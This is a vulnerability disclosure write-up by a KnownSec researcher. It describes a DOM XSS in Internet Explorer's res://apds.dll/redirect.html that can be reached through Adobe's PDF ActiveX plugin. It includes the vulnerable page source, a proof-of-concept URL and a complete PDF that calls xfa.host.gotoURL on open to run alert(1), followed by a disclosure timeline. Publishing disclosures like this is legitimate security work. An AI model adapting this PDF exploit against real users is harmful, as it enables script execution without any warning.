From http:// domain to res:// domain xss by using IE Adobe’s PDF ActiveX plugin

by Heige(a.k.a Superhei) of KnownSec 404 Team 03/19/2019

[Article release: https://paper.seebug.org/860/]

1 res://apds.dll/redirect.html dom xss

https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5 had reported an xss vulnerability in res://apds.dll/redirect.html. And this vulnerability has not been fixed until now.

this vulnerability is a typical dom xss vulnerability form the res://apds.dll/redirect.html code:

<!DOCTYPE html>
<html xmlns=”http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8"/>
 <script type=”text/javascript”>
 var targetParamRegex = /[\?\&]target=([^\&\#]+)/i;
 var targetResults = targetParamRegex.exec(window.location.search);
 if (targetResults) {
 window.location.replace(decodeURIComponent(targetResults[1]));
 }
 </script>
</head>
<body>
</body>
</html>

POC:

res://apds.dll/redirect.html?target=javascript:alert(1)

2 from http:// domain to res:// domain

Usually accessing res:// resources via http:// domain is not allowed. The Javascript function xfa.host.gotoURL() in Adobe PDF can access multiple URLs include http(s):// file:// etc. Of course, in general, there will be security tips when you open the PDF files.

But when we use xfa.host.gotoURL() to access res:// or http(s):// by IE Adobe’s PDF ActiveX plugin :

xfa.host.gotoURL(“res://apds.dll/redirect.html?target=javascript:alert(1);//”);

there are no security alerts. and the xss payload “alert(1)” is executed.

POC: http://xxxxxxx/r.pdf

r.pdf code:

%PDF-1.4
1 0 obj
<<>>
%endobj

2 0 obj <<>>
stream
<xdp:xdp xmlns:xdp=”http://ns.adobe.com/xdp/">
<config><present><pdf>
 <interactive>1</interactive>
</pdf></present></config>

<template>
 <subform name=”a”>
 <pageSet/>
 </subform>
</template>
</xdp:xdp>
endstream
endobj

trailer
<<
/Root
 <<
 /Pages <<>>
 /AcroForm
 <<
 /XFA 2 0 R
 >>
 /OpenAction
 <<
 /S/JavaScript
 /JS(
 xfa.host.gotoURL(“res://apds.dll/redirect.html?target=javascript:alert(1);//”);
 )
 >>
 >>
>>

demo tweet https://twitter.com/80vul/status/1048576146835558400

3 fixed?

Due to some security domain isolation of IE, the harm of res:// domain xss is limited. But I think Microsoft should actively fix the res://apds.dll/redirect.html xss vulnerability, and Adobe should disable or give corresponding security warnings when URL redirect,The world can be more beautiful and harmonious!

4 Timeline

October 04, 2018 Report it to Adobe PSIRT and MSRC
October 05, 2018 Adobe tracking number PSIRT-8981.
October 09, 2018 MSRC Case 47932 CRM:0461065793
October 18, 2018 Adobe PSIRT has been investigating and still
November 21, 2018 MSRC have completed our investigation and determined that the case doesn’t meet the bar for immediate servicing in a security update. 
March 19, 2019 Public